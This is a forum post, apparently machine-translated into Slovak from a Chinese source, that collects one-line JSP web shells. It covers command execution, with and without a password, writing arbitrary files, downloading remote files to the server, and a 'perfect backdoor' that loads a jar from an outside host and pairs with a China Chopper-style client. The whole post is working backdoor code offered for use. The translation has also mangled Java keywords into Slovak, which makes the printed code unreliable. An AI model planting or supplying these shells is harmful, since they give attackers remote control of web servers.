|
|
Zverejnené 2. 1. 2015 18:46:57
|
|
|
|
Prenesené z: http://p2j.cn/?p=1627
1. Vykonávať systémové príkazy:
Vykonávajte systémové príkazy bez ozveny:
<%Runtime.getRuntime().exec(request.getParameter("i"));%>
Žiadosť: http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls
Po vykonaní nebude žiadna ozvena, čo je veľmi výhodné pri odrazových granátoch.
Existujú ozveny pri overovaní hesla:
<% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; bajt[] b = nový bajt[2048]; out.print("<pre>); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>); }%>
Žiadosť: http://192.168.16.240:8080/Shell/cmd2.jsp?pwd=023&i=ls
2. Zakódujte reťazec a zapíšte ho do určeného súboru:
1:
<%new java.io.FileOutputStream(request.getParameter("f")).write(request.getParameter("c").getBytes());%>
Žiadosť: http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
Píšte do webového adresára:
<%new java.io.FileOutputStream(application.getRealPath("/")+"/"+request.getParameter("f")).write(request.getParameter("c").getBytes());%>
Žiadosť: http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
2:
<%new java.io.RandomAccessFile(request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
Žiadosť: http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
Píšte do webového adresára:
<%new java.io.RandomAccessFile(application.getRealPath("/")+"/"+request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
Žiadosť: http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
3: Stiahnite vzdialený súbor (ak nepoužívate apache io utils, nemôžete previesť vstupný tok na bajt, takže je to veľmi dlhé...)
<% java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream(); bajt[] b = nový bajt[1024]; java.io.ByteArrayOutputStream baos = nový java.io.ByteArrayOutputStream(); int a = -1; zatiaľ čo ((a = in.read(b)) != -1) { baos.write(b, 0, a); } new java.io.FileOutputStream(request.getParameter("f")).write(baos.toByteArray()); %>
Žiadosť: http://localhost:8080/Shell/download.jsp?f=/Users/yz/wwwroot/1.png&u=http://www.baidu.com/img/bdlogo.png
Stiahnuť na webovú cestu:
<% java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream(); bajt[] b = nový bajt[1024]; java.io.ByteArrayOutputStream baos = nový java.io.ByteArrayOutputStream(); int a = -1; zatiaľ čo ((a = in.read(b)) != -1) { baos.write(b, 0, a); } new java.io.FileOutputStream(application.getRealPath("/")+"/"+ request.getParameter("f")).write(baos.toByteArray()); %>
Žiadosť: http://localhost:8080/Shell/download.jsp?f=1.png&u=http://www.baidu.com/img/bdlogo.png
Štvrté: Reflexia volá vonkajší pohár, dokonalé zadné dvere
Ak sa vám nepáči vyššie uvedená funkcia zadných vrátok, ktorá je príliš slabá a zastaraná, môžete skúsiť toto:
<%=Class.forName("Load",true,new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(request.getParameter("u")))))).getMethods()[0].invoke(null, new Object[]{ request.getParameterMap()})%>
Žiadosť: http://192.168.16.240:8080/Shell/reflect.jsp?u=http://p2j.cn/Cat.jar&023=A
Pripojenie kuchynského noža: http://192.168.16.240:8080/Shell/reflect.jsp?u=http://p2j.cn/Cat.jar, heslo 023.
Riešenie:
Použite reflection na načítanie externého jaru do aktuálnej aplikácie a reflection vykoná výsledok spracovania výstupu. request.getParameterMap() obsahuje všetky požadované parametre. Keďže externý jar balík je načítaný, server musí mať prístup k tejto jar adrese. |
Predchádzajúci:Kríza za textovým súborom TXTBudúci:Java MD5 šifrovanie, Base64 šifrovanie a dešifrovanie Java vykonáva zdrojový kód systémových príkazov
|
Zverejnené 2. 1. 2015 20:17:30
|
Prenajímateľ|
Zverejnené 2. 1. 2015 20:39:44
|
